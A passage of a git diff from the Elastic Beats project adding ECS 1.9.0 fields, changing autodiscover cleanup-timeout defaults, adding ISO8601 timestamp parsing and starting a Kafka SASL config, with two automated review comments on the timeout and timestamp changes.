@@ -5753,6 +6166,18 @@ example: true -- +*`process.parent.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.parent.code_signature.status`*:: + -- @@ -5776,6 +6201,18 @@ example: Microsoft Corporation -- +*`process.parent.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.parent.code_signature.trusted`*:: + -- @@ -5898,6 +6335,15 @@ type: keyword -- +*`process.parent.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.parent.name`*:: + -- @@ -6636,6 +7082,17 @@ example: Montreal -- +*`server.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`server.geo.continent_name`*:: + -- @@ -6693,6 +7150,18 @@ example: boston-dc -- +*`server.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`server.geo.region_iso_code`*:: + -- @@ -6715,6 +7184,17 @@ example: Quebec -- +*`server.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`server.ip`*:: + -- 
@@ -6728,9 +7208,12 @@ type: ip + -- MAC address of the server. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`server.nat.ip`*:: @@ -7098,6 +7581,17 @@ example: Montreal -- +*`source.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`source.geo.continent_name`*:: + -- @@ -7155,6 +7649,18 @@ example: boston-dc -- +*`source.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`source.geo.region_iso_code`*:: + -- @@ -7177,6 +7683,17 @@ example: Quebec -- +*`source.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`source.ip`*:: + -- @@ -7190,9 +7707,12 @@ type: ip + -- MAC address of the source. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`source.nat.ip`*:: diff --git a/journalbeat/include/fields.go b/journalbeat/include/fields.go index 7ba781952a9..48d04fdf41d 100644 --- a/journalbeat/include/fields.go +++ b/journalbeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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" + return "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" } 
diff --git a/libbeat/Dockerfile b/libbeat/Dockerfile index b762849968f..df8ab228c5e 100644 --- a/libbeat/Dockerfile +++ b/libbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 RUN \ apt-get update \ diff --git a/libbeat/README.md b/libbeat/README.md index 4457f82afbf..cf99987c5a3 100644 --- a/libbeat/README.md +++ b/libbeat/README.md @@ -1,7 +1,7 @@ # libbeat - Framework for building the Beats libbeat is a Go library containing the common packages for all the -[Beats](https://www.elastic.co/products/beats). +[Beats](https://www.elastic.co/beats). It is Apache licensed and actively maintained by the Elastic team. If you want to create a new project that reads some sort of operational data diff --git a/libbeat/_meta/fields.common.yml b/libbeat/_meta/fields.common.yml index d474c109629..e298f459c68 100644 --- a/libbeat/_meta/fields.common.yml +++ b/libbeat/_meta/fields.common.yml @@ -34,3 +34,7 @@ - name: timeseries.instance type: keyword description: Time series instance id + + - name: user_agent.device.type + type: keyword + description: Type of device where the user agent is running. diff --git a/libbeat/_meta/fields.ecs.yml b/libbeat/_meta/fields.ecs.yml index c4d11499556..5a6093e48da 100644 --- a/libbeat/_meta/fields.ecs.yml +++ b/libbeat/_meta/fields.ecs.yml @@ -1,5 +1,5 @@ # WARNING! Do not edit this file directly, it was generated by the ECS project, -# based on ECS version 1.8.0. +# based on ECS version 1.9.0. # Please visit https://github.com/elastic/ecs to suggest changes to ECS fields. - key: ecs @@ -209,6 +209,13 @@ ignore_above: 1024 description: City name. example: Montreal + - name: geo.continent_code + level: core + type: keyword + ignore_above: 1024 + description: Two-letter code representing continent's name. + example: NA + default_field: false - name: geo.continent_name level: core type: keyword 
@@ -244,6 +251,16 @@ Not typically used in automated geolocation.' example: boston-dc + - name: geo.postal_code + level: core + type: keyword + ignore_above: 1024 + description: 'Postal code associated with the location. + + Values appropriate for this field may also be known as a postcode or ZIP code + and will vary widely from country to country.' + example: 94040 + default_field: false - name: geo.region_iso_code level: core type: keyword @@ -256,6 +273,13 @@ ignore_above: 1024 description: Region name. example: Quebec + - name: geo.timezone + level: core + type: keyword + ignore_above: 1024 + description: The time zone of the location, such as IANA time zone name. + example: America/Argentina/Buenos_Aires + default_field: false - name: ip level: core type: ip @@ -264,7 +288,13 @@ level: core type: keyword ignore_above: 1024 - description: MAC address of the client. + description: 'MAC address of the client. + + The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit + byte) is represented by two [uppercase] hexadecimal digits giving the value + of the octet as an unsigned integer. Successive octets are separated by a + hyphen.' + example: 00-00-5E-00-53-23 - name: nat.ip level: extended type: ip @@ -485,6 +515,17 @@ ignore_above: 1024 description: Region in which this host is running. example: us-east-1 + - name: service.name + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud service name is intended to distinguish services running + on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs + App Engine, Azure VM vs App Server. + + Examples: app engine, app service, cloud run, fargate, lambda.' + example: lambda + default_field: false - name: code_signature title: Code Signature group: 2 
@@ -497,6 +538,16 @@ description: Boolean to capture if a signature is present. example: 'true' default_field: false + - name: signing_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The identifier used to sign the process. + + This is used to identify the application manufactured by a software vendor. + The field is relevant to Apple *OS only.' + example: com.apple.xpc.proxy + default_field: false - name: status level: extended type: keyword @@ -515,6 +566,16 @@ description: Subject name of the code signer example: Microsoft Corporation default_field: false + - name: team_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The team identifier used to sign the process. + + This is used to identify the team or vendor of a software product. The field + is relevant to Apple *OS only.' + example: EQHXZ8M8AV + default_field: false - name: trusted level: extended type: boolean @@ -631,6 +692,13 @@ ignore_above: 1024 description: City name. example: Montreal + - name: geo.continent_code + level: core + type: keyword + ignore_above: 1024 + description: Two-letter code representing continent's name. + example: NA + default_field: false - name: geo.continent_name level: core type: keyword @@ -666,6 +734,16 @@ Not typically used in automated geolocation.' example: boston-dc + - name: geo.postal_code + level: core + type: keyword + ignore_above: 1024 + description: 'Postal code associated with the location. + + Values appropriate for this field may also be known as a postcode or ZIP code + and will vary widely from country to country.' + example: 94040 + default_field: false - name: geo.region_iso_code level: core type: keyword 
@@ -678,6 +756,13 @@ ignore_above: 1024 description: Region name. example: Quebec + - name: geo.timezone + level: core + type: keyword + ignore_above: 1024 + description: The time zone of the location, such as IANA time zone name. + example: America/Argentina/Buenos_Aires + default_field: false - name: ip level: core type: ip @@ -686,7 +771,13 @@ level: core type: keyword ignore_above: 1024 - description: MAC address of the destination. + description: 'MAC address of the destination. + + The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit + byte) is represented by two [uppercase] hexadecimal digits giving the value + of the octet as an unsigned integer. Successive octets are separated by a + hyphen.' + example: 00-00-5E-00-53-23 - name: nat.ip level: extended type: ip @@ -844,6 +935,16 @@ description: Boolean to capture if a signature is present. example: 'true' default_field: false + - name: code_signature.signing_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The identifier used to sign the process. + + This is used to identify the application manufactured by a software vendor. + The field is relevant to Apple *OS only.' + example: com.apple.xpc.proxy + default_field: false - name: code_signature.status level: extended type: keyword @@ -862,6 +963,16 @@ description: Subject name of the code signer example: Microsoft Corporation default_field: false + - name: code_signature.team_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The team identifier used to sign the process. + + This is used to identify the team or vendor of a software product. The field + is relevant to Apple *OS only.' + example: EQHXZ8M8AV + default_field: false - name: code_signature.trusted level: extended type: boolean 
@@ -904,6 +1015,12 @@ ignore_above: 1024 description: SHA512 hash. default_field: false + - name: hash.ssdeep + level: extended + type: keyword + ignore_above: 1024 + description: SSDEEP hash. + default_field: false - name: name level: core type: keyword @@ -1529,6 +1646,16 @@ description: Boolean to capture if a signature is present. example: 'true' default_field: false + - name: code_signature.signing_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The identifier used to sign the process. + + This is used to identify the application manufactured by a software vendor. + The field is relevant to Apple *OS only.' + example: com.apple.xpc.proxy + default_field: false - name: code_signature.status level: extended type: keyword @@ -1547,6 +1674,16 @@ description: Subject name of the code signer example: Microsoft Corporation default_field: false + - name: code_signature.team_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The team identifier used to sign the process. + + This is used to identify the team or vendor of a software product. The field + is relevant to Apple *OS only.' + example: EQHXZ8M8AV + default_field: false - name: code_signature.trusted level: extended type: boolean @@ -1642,6 +1779,12 @@ type: keyword ignore_above: 1024 description: SHA512 hash. + - name: hash.ssdeep + level: extended + type: keyword + ignore_above: 1024 + description: SSDEEP hash. + default_field: false - name: inode level: extended type: keyword @@ -1960,6 +2103,13 @@ ignore_above: 1024 description: City name. example: Montreal + - name: continent_code + level: core + type: keyword + ignore_above: 1024 + description: Two-letter code representing continent's name. + example: NA + default_field: false - name: continent_name level: core type: keyword 
@@ -1995,6 +2145,16 @@ Not typically used in automated geolocation.' example: boston-dc + - name: postal_code + level: core + type: keyword + ignore_above: 1024 + description: 'Postal code associated with the location. + + Values appropriate for this field may also be known as a postcode or ZIP code + and will vary widely from country to country.' + example: 94040 + default_field: false - name: region_iso_code level: core type: keyword @@ -2007,6 +2167,13 @@ ignore_above: 1024 description: Region name. example: Quebec + - name: timezone + level: core + type: keyword + ignore_above: 1024 + description: The time zone of the location, such as IANA time zone name. + example: America/Argentina/Buenos_Aires + default_field: false - name: group title: Group group: 2 @@ -2034,11 +2201,16 @@ - name: hash title: Hash group: 2 - description: 'The hash fields represent different hash algorithms and their values. + description: 'The hash fields represent different bitwise hash algorithms and + their values. Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators - as appropriate (snake case, e.g. sha3_512).' + as appropriate (snake case, e.g. sha3_512). + + Note that this fieldset is used for common hashes that may be computed over + a range of generic bytes. Entity-specific hashes such as ja3 or imphash are + placed in the fieldsets to which they relate (tls and pe, respectively).' type: group fields: - name: md5 @@ -2061,6 +2233,12 @@ type: keyword ignore_above: 1024 description: SHA512 hash. + - name: ssdeep + level: extended + type: keyword + ignore_above: 1024 + description: SSDEEP hash. + default_field: false - name: host title: Host group: 2 
@@ -2077,6 +2255,30 @@ ignore_above: 1024 description: Operating system architecture. example: x86_64 + - name: cpu.usage + level: extended + type: scaled_float + description: 'Percent CPU used which is normalized by the number of CPU cores + and it ranges from 0 to 1. + + Scaling factor: 1000. + + For example: For a two core host, this value should be the average of the + two cores, between 0 and 1.' + scaling_factor: 1000 + default_field: false + - name: disk.read.bytes + level: extended + type: long + description: The total number of bytes (gauge) read successfully (aggregated + from all disks) since the last metric collection. + default_field: false + - name: disk.write.bytes + level: extended + type: long + description: The total number of bytes (gauge) written successfully (aggregated + from all disks) since the last metric collection. + default_field: false - name: domain level: extended type: keyword @@ -2094,6 +2296,13 @@ ignore_above: 1024 description: City name. example: Montreal + - name: geo.continent_code + level: core + type: keyword + ignore_above: 1024 + description: Two-letter code representing continent's name. + example: NA + default_field: false - name: geo.continent_name level: core type: keyword @@ -2129,6 +2338,16 @@ Not typically used in automated geolocation.' example: boston-dc + - name: geo.postal_code + level: core + type: keyword + ignore_above: 1024 + description: 'Postal code associated with the location. + + Values appropriate for this field may also be known as a postcode or ZIP code + and will vary widely from country to country.' + example: 94040 + default_field: false - name: geo.region_iso_code level: core type: keyword 
@@ -2141,6 +2360,13 @@ ignore_above: 1024 description: Region name. example: Quebec + - name: geo.timezone + level: core + type: keyword + ignore_above: 1024 + description: The time zone of the location, such as IANA time zone name. + example: America/Argentina/Buenos_Aires + default_field: false - name: hostname level: core type: keyword @@ -2165,7 +2391,13 @@ level: core type: keyword ignore_above: 1024 - description: Host mac addresses. + description: 'Host MAC addresses. + + The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit + byte) is represented by two [uppercase] hexadecimal digits giving the value + of the octet as an unsigned integer. Successive octets are separated by a + hyphen.' + example: '["00-00-5E-00-53-23", "00-00-5E-00-53-24"]' - name: name level: core type: keyword @@ -2175,6 +2407,30 @@ It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: network.egress.bytes + level: extended + type: long + description: The number of bytes (gauge) sent out on all network interfaces + by the host since the last metric collection. + default_field: false + - name: network.egress.packets + level: extended + type: long + description: The number of packets (gauge) sent out on all network interfaces + by the host since the last metric collection. + default_field: false + - name: network.ingress.bytes + level: extended + type: long + description: The number of bytes received (gauge) on all network interfaces + by the host since the last metric collection. + default_field: false + - name: network.ingress.packets + level: extended + type: long + description: The number of packets (gauge) received on all network interfaces + by the host since the last metric collection. + default_field: false - name: os.family level: extended type: keyword 
@@ -2352,6 +2608,17 @@ format: bytes description: Total size in bytes of the request (body and headers). example: 1437 + - name: request.id + level: extended + type: keyword + ignore_above: 1024 + description: 'A unique identifier for each HTTP request to correlate logs between + clients and servers in transactions. + + The id may be contained in a non-standard HTTP header, such as `X-Request-ID` + or `X-Correlation-ID`.' + example: 123e4567-e89b-12d3-a456-426614174000 + default_field: false - name: request.method level: extended type: keyword @@ -2767,9 +3034,9 @@ level: extended type: object description: Observer.egress holds information like interface number and name, - vlan, and zone information to classify egress traffic. Single armed monitoring - such as a network sensor on a span port should only use observer.ingress - to categorize traffic. + vlan, and zone information to classify egress traffic. Single armed monitoring + such as a network sensor on a span port should only use observer.ingress to + categorize traffic. default_field: false - name: egress.interface.alias level: extended @@ -2813,7 +3080,7 @@ type: keyword ignore_above: 1024 description: Network zone of outbound traffic as reported by the observer to - categorize the destination area of egress traffic, e.g. Internal, External, + categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. example: Public_Internet default_field: false @@ -2823,6 +3090,13 @@ ignore_above: 1024 description: City name. example: Montreal + - name: geo.continent_code + level: core + type: keyword + ignore_above: 1024 + description: Two-letter code representing continent's name. + example: NA + default_field: false - name: geo.continent_name level: core type: keyword 
@@ -2858,6 +3132,16 @@ Not typically used in automated geolocation.' example: boston-dc + - name: geo.postal_code + level: core + type: keyword + ignore_above: 1024 + description: 'Postal code associated with the location. + + Values appropriate for this field may also be known as a postcode or ZIP code + and will vary widely from country to country.' + example: 94040 + default_field: false - name: geo.region_iso_code level: core type: keyword @@ -2870,6 +3154,13 @@ ignore_above: 1024 description: Region name. example: Quebec + - name: geo.timezone + level: core + type: keyword + ignore_above: 1024 + description: The time zone of the location, such as IANA time zone name. + example: America/Argentina/Buenos_Aires + default_field: false - name: hostname level: core type: keyword @@ -2879,9 +3170,9 @@ level: extended type: object description: Observer.ingress holds information like interface number and name, - vlan, and zone information to classify ingress traffic. Single armed monitoring - such as a network sensor on a span port should only use observer.ingress - to categorize traffic. + vlan, and zone information to classify ingress traffic. Single armed monitoring + such as a network sensor on a span port should only use observer.ingress to + categorize traffic. default_field: false - name: ingress.interface.alias level: extended @@ -2925,7 +3216,7 @@ type: keyword ignore_above: 1024 description: Network zone of incoming traffic as reported by the observer to - categorize the source area of ingress traffic. e.g. internal, External, DMZ, + categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. example: DMZ default_field: false 
@@ -2937,7 +3228,13 @@ level: core type: keyword ignore_above: 1024 - description: MAC addresses of the observer + description: 'MAC addresses of the observer. + + The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit + byte) is represented by two [uppercase] hexadecimal digits giving the value + of the octet as an unsigned integer. Successive octets are separated by a + hyphen.' + example: '["00-00-5E-00-53-23", "00-00-5E-00-53-24"]' - name: name level: extended type: keyword @@ -3325,6 +3622,16 @@ description: Boolean to capture if a signature is present. example: 'true' default_field: false + - name: code_signature.signing_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The identifier used to sign the process. + + This is used to identify the application manufactured by a software vendor. + The field is relevant to Apple *OS only.' + example: com.apple.xpc.proxy + default_field: false - name: code_signature.status level: extended type: keyword @@ -3343,6 +3650,16 @@ description: Subject name of the code signer example: Microsoft Corporation default_field: false + - name: code_signature.team_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The team identifier used to sign the process. + + This is used to identify the team or vendor of a software product. The field + is relevant to Apple *OS only.' + example: EQHXZ8M8AV + default_field: false - name: code_signature.trusted level: extended type: boolean @@ -3430,6 +3747,12 @@ type: keyword ignore_above: 1024 description: SHA512 hash. + - name: hash.ssdeep + level: extended + type: keyword + ignore_above: 1024 + description: SSDEEP hash. + default_field: false - name: name level: extended type: keyword 
@@ -3469,6 +3792,16 @@ description: Boolean to capture if a signature is present. example: 'true' default_field: false + - name: parent.code_signature.signing_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The identifier used to sign the process. + + This is used to identify the application manufactured by a software vendor. + The field is relevant to Apple *OS only.' + example: com.apple.xpc.proxy + default_field: false - name: parent.code_signature.status level: extended type: keyword @@ -3487,6 +3820,16 @@ description: Subject name of the code signer example: Microsoft Corporation default_field: false + - name: parent.code_signature.team_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The team identifier used to sign the process. + + This is used to identify the team or vendor of a software product. The field + is relevant to Apple *OS only.' + example: EQHXZ8M8AV + default_field: false - name: parent.code_signature.trusted level: extended type: boolean @@ -3578,6 +3921,12 @@ ignore_above: 1024 description: SHA512 hash. default_field: false + - name: parent.hash.ssdeep + level: extended + type: keyword + ignore_above: 1024 + description: SSDEEP hash. + default_field: false - name: parent.name level: extended type: keyword @@ -4095,6 +4444,13 @@ ignore_above: 1024 description: City name. example: Montreal + - name: geo.continent_code + level: core + type: keyword + ignore_above: 1024 + description: Two-letter code representing continent's name. + example: NA + default_field: false - name: geo.continent_name level: core type: keyword 
@@ -4130,6 +4486,16 @@ Not typically used in automated geolocation.' example: boston-dc + - name: geo.postal_code + level: core + type: keyword + ignore_above: 1024 + description: 'Postal code associated with the location. + + Values appropriate for this field may also be known as a postcode or ZIP code + and will vary widely from country to country.' + example: 94040 + default_field: false - name: geo.region_iso_code level: core type: keyword @@ -4142,6 +4508,13 @@ ignore_above: 1024 description: Region name. example: Quebec + - name: geo.timezone + level: core + type: keyword + ignore_above: 1024 + description: The time zone of the location, such as IANA time zone name. + example: America/Argentina/Buenos_Aires + default_field: false - name: ip level: core type: ip @@ -4150,7 +4523,13 @@ level: core type: keyword ignore_above: 1024 - description: MAC address of the server. + description: 'MAC address of the server. + + The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit + byte) is represented by two [uppercase] hexadecimal digits giving the value + of the octet as an unsigned integer. Successive octets are separated by a + hyphen.' + example: 00-00-5E-00-53-23 - name: nat.ip level: extended type: ip @@ -4431,6 +4810,13 @@ ignore_above: 1024 description: City name. example: Montreal + - name: geo.continent_code + level: core + type: keyword + ignore_above: 1024 + description: Two-letter code representing continent's name. + example: NA + default_field: false - name: geo.continent_name level: core type: keyword 
@@ -4466,6 +4852,16 @@ Not typically used in automated geolocation.' example: boston-dc + - name: geo.postal_code + level: core + type: keyword + ignore_above: 1024 + description: 'Postal code associated with the location. + + Values appropriate for this field may also be known as a postcode or ZIP code + and will vary widely from country to country.' + example: 94040 + default_field: false - name: geo.region_iso_code level: core type: keyword @@ -4478,6 +4874,13 @@ ignore_above: 1024 description: Region name. example: Quebec + - name: geo.timezone + level: core + type: keyword + ignore_above: 1024 + description: The time zone of the location, such as IANA time zone name. + example: America/Argentina/Buenos_Aires + default_field: false - name: ip level: core type: ip @@ -4486,7 +4889,13 @@ level: core type: keyword ignore_above: 1024 - description: MAC address of the source. + description: 'MAC address of the source. + + The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit + byte) is represented by two [uppercase] hexadecimal digits giving the value + of the octet as an unsigned integer. Successive octets are separated by a + hyphen.' + example: 00-00-5E-00-53-23 - name: nat.ip level: extended type: ip diff --git a/libbeat/autodiscover/providers/docker/config.go b/libbeat/autodiscover/providers/docker/config.go index 4780addecbd..0af6c2791dd 100644 --- a/libbeat/autodiscover/providers/docker/config.go +++ b/libbeat/autodiscover/providers/docker/config.go @@ -40,12 +40,15 @@ type Config struct { CleanupTimeout time.Duration `config:"cleanup_timeout" validate:"positive"` } +// Public variable, so specific beats (as Filebeat) can set a different cleanup timeout if they need it. +var DefaultCleanupTimeout time.Duration = 0 + func defaultConfig() *Config { return &Config{ Host: "unix:///var/run/docker.sock", Prefix: "co.elastic", Dedot: true, - CleanupTimeout: 60 * time.Second, + CleanupTimeout: DefaultCleanupTimeout, } } 
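Review bot: The docker provider's `defaultConfig` no longer falls back to `60 * time.Second` for `CleanupTimeout` but to `DefaultCleanupTimeout`, which is 0 unless another package assigns it before `defaultConfig()` runs. Any beat that does not set it will drop a stopped container's configuration immediately, which for log collection can mean losing the last lines a short-lived container wrote. The assignment is not visible in this hunk, so it is worth confirming where it happens and that it precedes provider creation. The comment should follow the Go doc convention and state that contract, e.g. `// DefaultCleanupTimeout is the cleanup_timeout used when none is configured; beats that keep reading after a container stops (such as Filebeat) must set it before the provider is created.`, and the declaration can be just `var DefaultCleanupTimeout time.Duration`. The same applies to the identical variable added in libbeat/autodiscover/providers/kubernetes/config.go.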
diff --git a/libbeat/autodiscover/providers/kubernetes/config.go b/libbeat/autodiscover/providers/kubernetes/config.go index 84672659f74..82e115527aa 100644 --- a/libbeat/autodiscover/providers/kubernetes/config.go +++ b/libbeat/autodiscover/providers/kubernetes/config.go @@ -57,11 +57,14 @@ type Config struct { AddResourceMetadata *metadata.AddResourceMetadataConfig `config:"add_resource_metadata"` } +// Public variable, so specific beats (as Filebeat) can set a different cleanup timeout if they need it. +var DefaultCleanupTimeout time.Duration = 0 + func defaultConfig() *Config { return &Config{ SyncPeriod: 10 * time.Minute, Resource: "pod", - CleanupTimeout: 60 * time.Second, + CleanupTimeout: DefaultCleanupTimeout, Prefix: "co.elastic", Unique: false, } diff --git a/winlogbeat/sys/xmlreader.go b/libbeat/common/encoding/xml/safe_reader.go similarity index 85% rename from winlogbeat/sys/xmlreader.go rename to libbeat/common/encoding/xml/safe_reader.go index ba51c90dcd5..9c7c95c73c6 100644 --- a/winlogbeat/sys/xmlreader.go +++ b/libbeat/common/encoding/xml/safe_reader.go @@ -15,7 +15,7 @@ // specific language governing permissions and limitations // under the License. -package sys +package xml import ( "bytes" @@ -25,18 +25,18 @@ import ( "unicode/utf8" ) -// The type xmlSafeReader escapes UTF control characters in the io.Reader +// A SafeReader escapes UTF control characters in the io.Reader // it wraps, so that it can be fed to Go's xml parser. // Characters for which `unicode.IsControl` returns true will be output as // an hexadecimal unicode escape sequence "\\uNNNN". -type xmlSafeReader struct { +type SafeReader struct { inner io.Reader backing [256]byte buf []byte code []byte } -var _ io.Reader = (*xmlSafeReader)(nil) +var _ io.Reader = (*SafeReader)(nil) func output(n int) (int, error) { if n == 0 { 
@@ -46,7 +46,7 @@ func output(n int) (int, error) { } // Read implements the io.Reader interface. -func (r *xmlSafeReader) Read(d []byte) (n int, err error) { +func (r *SafeReader) Read(d []byte) (n int, err error) { if len(r.code) > 0 { n = copy(d, r.code) r.code = r.code[n:] @@ -73,6 +73,6 @@ func (r *xmlSafeReader) Read(d []byte) (n int, err error) { return output(n) } -func newXMLSafeReader(rawXML []byte) io.Reader { - return &xmlSafeReader{inner: bytes.NewReader(rawXML)} +func NewSafeReader(rawXML []byte) *SafeReader { + return &SafeReader{inner: bytes.NewReader(rawXML)} } diff --git a/libbeat/common/jsontransform/jsonhelper.go b/libbeat/common/jsontransform/jsonhelper.go index 74742cddef2..d52939c6922 100644 --- a/libbeat/common/jsontransform/jsonhelper.go +++ b/libbeat/common/jsontransform/jsonhelper.go @@ -18,6 +18,7 @@ package jsontransform import ( + "errors" "fmt" "time" @@ -26,6 +27,16 @@ import ( "github.com/elastic/beats/v7/libbeat/logp" ) +const ( + iso8601 = "2006-01-02T15:04:05.000Z0700" +) + +var ( + // ErrInvalidTimestamp is returned when parsing of a @timestamp field fails. + // Supported formats: ISO8601, RFC3339 + ErrInvalidTimestamp = errors.New("failed to parse @timestamp, unknown format") +) + // WriteJSONKeys writes the json keys to the given event based on the overwriteKeys option and the addErrKey func WriteJSONKeys(event *beat.Event, keys map[string]interface{}, expandKeys, overwriteKeys, addErrKey bool) { logger := logp.NewLogger("jsonhelper") 
@@ -56,8 +67,8 @@ func WriteJSONKeys(event *beat.Event, keys map[string]interface{}, expandKeys, o continue } - // @timestamp must be of format RFC3339 - ts, err := time.Parse(time.RFC3339, vstr) + // @timestamp must be of format RFC3339 or ISO8601 + ts, err := parseTimestamp(vstr) if err != nil { logger.Errorf("JSON: Won't overwrite @timestamp because of parsing error: %v", err) event.SetErrorWithOption(createJSONError(fmt.Sprintf("@timestamp not overwritten (parse error on %s)", vstr)), addErrKey) @@ -110,3 +121,21 @@ func removeKeys(keys map[string]interface{}, names ...string) { delete(keys, name) } } + +func parseTimestamp(timestamp string) (time.Time, error) { + validFormats := []string{ + time.RFC3339, + iso8601, + } + + for _, f := range validFormats { + ts, parseErr := time.Parse(f, timestamp) + if parseErr != nil { + continue + } + + return ts, nil + } + + return time.Time{}, ErrInvalidTimestamp +} diff --git a/libbeat/common/jsontransform/jsonhelper_test.go b/libbeat/common/jsontransform/jsonhelper_test.go index ae4e4874f8d..faa00123beb 100644 --- a/libbeat/common/jsontransform/jsonhelper_test.go +++ b/libbeat/common/jsontransform/jsonhelper_test.go 
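Review bot: The `iso8601` layout that `parseTimestamp` tries is `2006-01-02T15:04:05.000Z0700`, and as far as Go's `time.Parse` treats a `.000` element it requires exactly three fractional digits. ISO 8601 timestamps with a colon-less offset and no fraction, or with microsecond precision, are therefore still rejected, and the event keeps its ingest time instead of the source time, which skews any timeline built from `@timestamp`. The comment on `ErrInvalidTimestamp` ("Supported formats: ISO8601, RFC3339") promises more than that. Either add a fraction-tolerant layout to `validFormats`, `"2006-01-02T15:04:05Z0700",` (Go accepts an optional fractional second after the seconds field when parsing), or narrow the comment to millisecond precision only. `parseTimestamp` also lacks a doc comment; `// parseTimestamp parses timestamp using each supported layout in turn and returns ErrInvalidTimestamp if none matches.` would do.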
@@ -89,6 +89,41 @@ func TestWriteJSONKeys(t *testing.T) { "top_c": "COMPLETELY_NEW_c", }, }, + "overwrite_true_ISO8601": { + overwriteKeys: true, + keys: map[string]interface{}{ + "@metadata": map[string]interface{}{ + "foo": "NEW_bar", + "baz": map[string]interface{}{ + "qux": "NEW_qux", + "durrr": "COMPLETELY_NEW", + }, + }, + "@timestamp": now.Format(iso8601), + "top_b": map[string]interface{}{ + "inner_d": "NEW_dee", + "inner_e": "COMPLETELY_NEW_e", + }, + "top_c": "COMPLETELY_NEW_c", + }, + expectedMetadata: common.MapStr{ + "foo": "NEW_bar", + "baz": common.MapStr{ + "qux": "NEW_qux", + "durrr": "COMPLETELY_NEW", + }, + }, + expectedTimestamp: now, + expectedFields: common.MapStr{ + "top_a": 23, + "top_b": common.MapStr{ + "inner_c": "see", + "inner_d": "NEW_dee", + "inner_e": "COMPLETELY_NEW_e", + }, + "top_c": "COMPLETELY_NEW_c", + }, + }, "overwrite_false": { overwriteKeys: false, keys: map[string]interface{}{ diff --git a/libbeat/common/kafka/sasl.go b/libbeat/common/kafka/sasl.go new file mode 100644 index 00000000000..9a6b3314b8b --- /dev/null +++ b/libbeat/common/kafka/sasl.go 
@@ -0,0 +1,69 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package kafka + +import ( + "fmt" + "strings" + + "github.com/Shopify/sarama" +) + +type SaslConfig struct { + SaslMechanism string `config:"mechanism"` +} + +const ( + saslTypePlaintext = sarama.SASLTypePlaintext + saslTypeSCRAMSHA256 = sarama.SASLTypeSCRAMSHA256 + saslTypeSCRAMSHA512 = sarama.SASLTypeSCRAMSHA512 +) + +func (c *SaslConfig) ConfigureSarama(config *sarama.Config) { + switch strings.ToUpper(c.SaslMechanism) { // try not to force users to use all upper case + case "": + // SASL is not enabled + return + case saslTypePlaintext: + config.Net.SASL.Mechanism = sarama.SASLMechanism(sarama.SASLTypePlaintext) + case saslTypeSCRAMSHA256: + config.Net.SASL.Handshake = true + config.Net.SASL.Mechanism = sarama.SASLMechanism(sarama.SASLTypeSCRAMSHA256) + config.Net.SASL.SCRAMClientGeneratorFunc = func() sarama.SCRAMClient { + return &XDGSCRAMClient{HashGeneratorFcn: SHA256} + } + case saslTypeSCRAMSHA512: + config.Net.SASL.Handshake = true + 